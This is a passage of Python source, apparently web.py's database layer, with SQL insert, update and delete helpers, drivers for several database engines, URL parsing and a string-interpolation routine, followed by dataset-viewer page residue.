        for i, row in enumerate(values):
            if i != 0:
                sql_query.append(", ")
            SQLQuery.join([SQLParam(row[k]) for k in keys], sep=", ", target=sql_query, prefix="(", suffix=")")
        if _test: return sql_query
        db_cursor = self._db_cursor()
        if seqname is not False:
            sql_query = self._process_insert_query(sql_query, tablename, seqname)
        if isinstance(sql_query, tuple):
            # for some databases, a separate query has to be made to find
            # the id of the inserted row.
            q1, q2 = sql_query
            self._db_execute(db_cursor, q1)
            self._db_execute(db_cursor, q2)
        else:
            self._db_execute(db_cursor, sql_query)
        try:
            out = db_cursor.fetchone()[0]
            # Assumes consecutive ids were assigned to the inserted rows.
            out = range(out-len(values)+1, out+1)
        except Exception:
            out = None
        if not self.ctx.transactions:
            self.ctx.commit()
        return out
    def update(self, tables, where, vars=None, _test=False, **values):
        """
        Update `tables` with clause `where` (interpolated using `vars`)
        and setting `values`.

        >>> db = DB(None, {})
        >>> name = 'Joseph'
        >>> q = db.update('foo', where='name = $name', name='bob', age=2,
        ...     created=SQLLiteral('NOW()'), vars=locals(), _test=True)
        >>> q
        <sql: "UPDATE foo SET age = 2, created = NOW(), name = 'bob' WHERE name = 'Joseph'">
        >>> q.query()
        'UPDATE foo SET age = %s, created = NOW(), name = %s WHERE name = %s'
        >>> q.values()
        [2, 'bob', 'Joseph']
        """
        if vars is None: vars = {}
        where = self._where(where, vars)
        # Sorted for deterministic SET ordering (Py3 doctest compatibility).
        values = sorted(values.items(), key=lambda t: t[0])
        query = (
          "UPDATE " + sqllist(tables) +
          " SET " + sqlwhere(values, ', ') +
          " WHERE " + where)
        if _test: return query
        db_cursor = self._db_cursor()
        self._db_execute(db_cursor, query)
        if not self.ctx.transactions:
            self.ctx.commit()
        return db_cursor.rowcount
    def delete(self, table, where, using=None, vars=None, _test=False):
        """
        Deletes from `table` with clauses `where` and `using`.

        >>> db = DB(None, {})
        >>> name = 'Joe'
        >>> db.delete('foo', where='name = $name', vars=locals(), _test=True)
        <sql: "DELETE FROM foo WHERE name = 'Joe'">
        """
        if vars is None: vars = {}
        where = self._where(where, vars)
        q = 'DELETE FROM ' + table
        if using: q += ' USING ' + sqllist(using)
        if where: q += ' WHERE ' + where
        if _test: return q
        db_cursor = self._db_cursor()
        self._db_execute(db_cursor, q)
        if not self.ctx.transactions:
            self.ctx.commit()
        return db_cursor.rowcount
    def _process_insert_query(self, query, tablename, seqname):
        # Hook for subclasses to append/prepend id-retrieval queries.
        return query
    def transaction(self):
        """Start a transaction."""
        return Transaction(self.ctx)
class PostgresDB(DB):
    """Postgres driver."""
    def __init__(self, **keywords):
        # web.py uses `pw`; the drivers expect `password`.
        if 'pw' in keywords:
            keywords['password'] = keywords.pop('pw')
        db_module = import_driver(["psycopg2", "psycopg", "pgdb"], preferred=keywords.pop('driver', None))
        if db_module.__name__ == "psycopg2":
            import psycopg2.extensions
            psycopg2.extensions.register_type(psycopg2.extensions.UNICODE)
        if db_module.__name__ == "pgdb" and 'port' in keywords:
            # pgdb takes "host:port" instead of a separate port argument.
            keywords["host"] += ":" + str(keywords.pop('port'))
        # if db is not provided postgres driver will take it from PGDATABASE environment variable
        if 'db' in keywords:
            keywords['database'] = keywords.pop('db')
        self.dbname = "postgres"
        self.paramstyle = db_module.paramstyle
        DB.__init__(self, db_module, keywords)
        self.supports_multiple_insert = True
        # Lazily-populated cache of sequence names (see _get_all_sequences).
        self._sequences = None
    def _process_insert_query(self, query, tablename, seqname):
        # Append a currval() call so insert() can return the new row id.
        if seqname is None:
            # when seqname is not provided guess the seqname and make sure it exists
            seqname = tablename + "_id_seq"
            if seqname not in self._get_all_sequences():
                seqname = None
        if seqname:
            query += "; SELECT currval('%s')" % seqname
        return query
    def _get_all_sequences(self):
        """Query postgres to find names of all sequences used in this database."""
        if self._sequences is None:
            q = "SELECT c.relname FROM pg_class c WHERE c.relkind = 'S'"
            self._sequences = set([c.relname for c in self.query(q)])
        return self._sequences
    def _connect(self, keywords):
        conn = DB._connect(self, keywords)
        try:
            conn.set_client_encoding('UTF8')
        except AttributeError:
            # fallback for pgdb driver
            conn.cursor().execute("set client_encoding to 'UTF-8'")
        return conn
    def _connect_with_pooling(self, keywords):
        conn = DB._connect_with_pooling(self, keywords)
        # Reach through the DBUtils wrappers to the raw psycopg connection.
        conn._con._con.set_client_encoding('UTF8')
        return conn
class MySQLDB(DB):
    """MySQL driver based on MySQLdb."""
    def __init__(self, **keywords):
        import MySQLdb as db
        # Accept `pw` as an alias for the driver's `passwd` argument.
        if 'pw' in keywords:
            keywords['passwd'] = keywords.pop('pw')
        # Default the connection charset to utf8; an explicit charset=None
        # removes the option from the keywords entirely.
        charset = keywords.get('charset', 'utf8')
        if charset is None:
            del keywords['charset']
        else:
            keywords['charset'] = charset
        self.paramstyle = db.paramstyle = 'pyformat' # it's both, like psycopg
        self.dbname = "mysql"
        DB.__init__(self, db, keywords)
        self.supports_multiple_insert = True
    def _process_insert_query(self, query, tablename, seqname):
        # Fetch the autoincrement id with a follow-up statement.
        return query, SQLQuery('SELECT last_insert_id();')
    def _get_insert_default_values_query(self, table):
        # MySQL's spelling of an all-defaults INSERT.
        return "INSERT INTO %s () VALUES()" % table
def import_driver(drivers, preferred=None):
    """Import the first available driver or preferred driver.

    `drivers` is a list of module names tried in order; when `preferred`
    is given, it becomes the only candidate. Raises ImportError when no
    candidate module can be imported.
    """
    candidates = [preferred] if preferred else drivers
    for modname in candidates:
        try:
            # The non-empty fromlist makes __import__ return the leaf module
            # (e.g. "pysqlite2.dbapi2" rather than the "pysqlite2" package).
            return __import__(modname, None, None, ['x'])
        except ImportError:
            continue
    raise ImportError("Unable to import " + " or ".join(candidates))
class SqliteDB(DB):
    """SQLite driver (sqlite3, pysqlite2 or the legacy sqlite module)."""
    def __init__(self, **keywords):
        db = import_driver(["sqlite3", "pysqlite2.dbapi2", "sqlite"], preferred=keywords.pop('driver', None))
        if db.__name__ in ["sqlite3", "pysqlite2.dbapi2"]:
            db.paramstyle = 'qmark'
            # sqlite driver doesn't create datetime objects for timestamp columns unless `detect_types` option is passed.
            # It seems to be supported in sqlite3 and pysqlite2 drivers, not sure about sqlite.
            keywords.setdefault('detect_types', db.PARSE_DECLTYPES)
        self.paramstyle = db.paramstyle
        keywords['database'] = keywords.pop('db')
        keywords['pooling'] = False # sqlite doesn't allow connections to be shared between threads
        self.dbname = "sqlite"
        DB.__init__(self, db, keywords)
    def _process_insert_query(self, query, tablename, seqname):
        # sqlite exposes the new row id via last_insert_rowid().
        return query, SQLQuery('SELECT last_insert_rowid();')
    def query(self, *a, **kw):
        out = DB.query(self, *a, **kw)
        if isinstance(out, iterbetter):
            # sqlite cursors don't report a usable rowcount, so drop the
            # __len__ that iterbetter provides.
            del out.__len__
        return out
class FirebirdDB(DB):
    """Firebird Database.

    Driver: kinterbasdb. Accepts `pw` as an alias for `password` and
    `db` as an alias for `database`.
    """
    def __init__(self, **keywords):
        # Fail fast with a clear ImportError. The original silently set
        # `db = None` on import failure, which deferred the error to an
        # opaque AttributeError on `db.paramstyle` below.
        try:
            import kinterbasdb as db
        except ImportError as e:
            raise ImportError("Unable to import kinterbasdb (required for FirebirdDB)") from e
        if 'pw' in keywords:
            keywords['password'] = keywords.pop('pw')
        keywords['database'] = keywords.pop('db')
        self.paramstyle = db.paramstyle
        DB.__init__(self, db, keywords)
    def delete(self, table, where=None, using=None, vars=None, _test=False):
        # firebird doesn't support using clause
        using = None
        return DB.delete(self, table, where, using, vars, _test)
    def sql_clauses(self, what, tables, where, group, order, limit, offset):
        # Firebird spells LIMIT/OFFSET as FIRST/SKIP, placed before the
        # select list.
        return (
            ('SELECT', ''),
            ('FIRST', limit),
            ('SKIP', offset),
            ('', what),
            ('FROM', sqllist(tables)),
            ('WHERE', where),
            ('GROUP BY', group),
            ('ORDER BY', order)
        )
class MSSQLDB(DB):
    """Microsoft SQL Server driver based on pymssql."""
    def __init__(self, **keywords):
        import pymssql as db
        # Accept `pw` as an alias for the driver's `password` argument.
        if 'pw' in keywords:
            keywords['password'] = keywords.pop('pw')
        keywords['database'] = keywords.pop('db')
        self.dbname = "mssql"
        DB.__init__(self, db, keywords)
    def _process_query(self, sql_query):
        """Takes the SQLQuery object and returns query string and parameters.
        """
        # MSSQLDB expects params to be a tuple.
        # Overwriting the default implementation to convert params to tuple.
        paramstyle = getattr(self, 'paramstyle', 'pyformat')
        query = sql_query.query(paramstyle)
        params = sql_query.values()
        return query, tuple(params)
    def sql_clauses(self, what, tables, where, group, order, limit, offset):
        # MSSQL uses a TOP clause (after SELECT) instead of LIMIT.
        return (
            ('SELECT', what),
            ('TOP', limit),
            ('FROM', sqllist(tables)),
            ('WHERE', where),
            ('GROUP BY', group),
            ('ORDER BY', order),
            ('OFFSET', offset))
    def _test(self):
        """Test LIMIT.
        Fake presence of pymssql module for running tests.
        >>> import sys
        >>> sys.modules['pymssql'] = sys.modules['sys']
        MSSQL has TOP clause instead of LIMIT clause.
        >>> db = MSSQLDB(db='test', user='joe', pw='secret')
        >>> db.select('foo', limit=4, _test=True)
        <sql: 'SELECT * TOP 4 FROM foo'>
        """
        # Exists only to carry the doctest above; intentionally a no-op.
        pass
class OracleDB(DB):
    """Oracle driver based on cx_Oracle."""
    def __init__(self, **keywords):
        import cx_Oracle as db
        # Accept `pw` as an alias for the driver's `password` argument.
        if 'pw' in keywords:
            keywords['password'] = keywords.pop('pw')
        #@@ TODO: use db.makedsn if host, port is specified
        keywords['dsn'] = keywords.pop('db')
        self.dbname = 'oracle'
        db.paramstyle = 'numeric'
        self.paramstyle = db.paramstyle
        # oracle doesn't support pooling
        keywords.pop('pooling', None)
        DB.__init__(self, db, keywords)
    def _process_insert_query(self, query, tablename, seqname):
        # It is not possible to get seq name from table name in Oracle,
        # so only append the currval lookup when a sequence is given.
        if seqname is None:
            return query
        return query + "; SELECT %s.currval FROM dual" % seqname
def dburl2dict(url):
    """
    Takes a URL to a database and parses it into an equivalent dictionary.
    >>> dburl2dict('postgres:///mygreatdb') == {'pw': None, 'dbn': 'postgres', 'db': 'mygreatdb', 'host': None, 'user': None, 'port': None}
    True
    >>> dburl2dict('postgres://james:day@serverfarm.example.net:5432/mygreatdb') == {'pw': 'day', 'dbn': 'postgres', 'db': 'mygreatdb', 'host': 'serverfarm.example.net', 'user': 'james', 'port': 5432}
    True
    >>> dburl2dict('postgres://james:day@serverfarm.example.net/mygreatdb') == {'pw': 'day', 'dbn': 'postgres', 'db': 'mygreatdb', 'host': 'serverfarm.example.net', 'user': 'james', 'port': None}
    True
    >>> dburl2dict('postgres://james:d%40y@serverfarm.example.net/mygreatdb') == {'pw': 'd@y', 'dbn': 'postgres', 'db': 'mygreatdb', 'host': 'serverfarm.example.net', 'user': 'james', 'port': None}
    True
    >>> dburl2dict('mysql://james:d%40y@serverfarm.example.net/mygreatdb') == {'pw': 'd@y', 'dbn': 'mysql', 'db': 'mygreatdb', 'host': 'serverfarm.example.net', 'user': 'james', 'port': None}
    True
    """
    parsed = urlparse.urlparse(unquote(url))
    return {
        'dbn': parsed.scheme,
        'user': parsed.username,
        'pw': parsed.password,
        'db': parsed.path[1:],   # strip the leading "/"
        'host': parsed.hostname,
        'port': parsed.port,
    }
# Registry mapping a driver name (e.g. "mysql") to its DB subclass.
_databases = {}
def database(dburl=None, **params):
    """Creates appropriate database using params.
    Pooling will be enabled if DBUtils module is available.
    Pooling can be disabled by passing pooling=False in params.
    """
    if not (dburl or params):
        # No arguments at all: fall back to the conventional env variable.
        dburl = os.environ['DATABASE_URL']
    if dburl:
        params = dburl2dict(dburl)
    dbn = params.pop('dbn')
    factory = _databases.get(dbn)
    if factory is None:
        raise UnknownDB(dbn)
    return factory(**params)
def register_database(name, clazz):
    """
    Register a database.
    >>> class LegacyDB(DB):
    ...     def __init__(self, **params):
    ...        pass
    ...
    >>> register_database('legacy', LegacyDB)
    >>> db = database(dbn='legacy', db='test', user='joe', passwd='secret')
    """
    _databases[name] = clazz
# Register the built-in drivers so database(dbn=...) can look them up by name.
register_database('mysql', MySQLDB)
register_database('postgres', PostgresDB)
register_database('sqlite', SqliteDB)
register_database('firebird', FirebirdDB)
register_database('mssql', MSSQLDB)
register_database('oracle', OracleDB)
def _interpolate(format):
    """
    Takes a format string and returns a list of 2-tuples of the form
    (boolean, string) where boolean says whether string should be evaled
    or not.
    from <http://lfw.org/python/Itpl.py> (public domain, Ka-Ping Yee)
    """
    def matchorfail(text, pos):
        # Match exactly one Python token at `pos` or raise with position info.
        match = tokenprog.match(text, pos)
        if match is None:
            raise _ItplError(text, pos)
        return match, match.end()
    # Characters allowed in a bare $name identifier.
    namechars = "abcdefghijklmnopqrstuvwxyz" \
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_";
    chunks = []
    pos = 0
    while 1:
        dollar = format.find("$", pos)
        if dollar < 0:
            break
        # NOTE(review): a trailing lone "$" would IndexError here -- confirm
        # callers never pass a format ending in "$".
        nextchar = format[dollar + 1]
        if nextchar == "{":
            # ${expr}: scan token-by-token until the braces balance.
            chunks.append((0, format[pos:dollar]))
            pos, level = dollar + 2, 1
            while level:
                match, pos = matchorfail(format, pos)
                tstart, tend = match.regs[3]
                token = format[tstart:tend]
                if token == "{":
                    level = level + 1
                elif token == "}":
                    level = level - 1
            # Everything between the braces is an eval chunk.
            chunks.append((1, format[dollar + 2:pos - 1]))
        elif nextchar in namechars:
            # $name, optionally extended with .attr chains and (...)/[...] trailers.
            chunks.append((0, format[pos:dollar]))
            match, pos = matchorfail(format, dollar + 1)
            while pos < len(format):
                if format[pos] == "." and \
                    pos + 1 < len(format) and format[pos + 1] in namechars:
                    # Attribute access: consume ".name".
                    match, pos = matchorfail(format, pos + 1)
                elif format[pos] in "([":
                    # Call or subscript: consume a balanced (...) or [...].
                    pos, level = pos + 1, 1
                    while level:
                        match, pos = matchorfail(format, pos)
                        tstart, tend = match.regs[3]
                        token = format[tstart:tend]
                        if token[0] in "([":
                            level = level + 1
                        elif token[0] in ")]":
                            level = level - 1
                else:
                    break
            chunks.append((1, format[dollar + 1:pos]))
        else:
            # "$" not starting an expression: keep it literally; "$$" escapes
            # to a single "$" (the second one is skipped).
            chunks.append((0, format[pos:dollar + 1]))
            pos = dollar + 1 + (nextchar == "$")
    if pos < len(format):
        # Trailing literal text after the last "$".
        chunks.append((0, format[pos:]))
    return chunks
if __name__ == "__main__":
    # Run this module's embedded doctests when executed directly.
    import doctest
    doctest.testmod()
| [
"China_Aisa@live.com"
] | China_Aisa@live.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.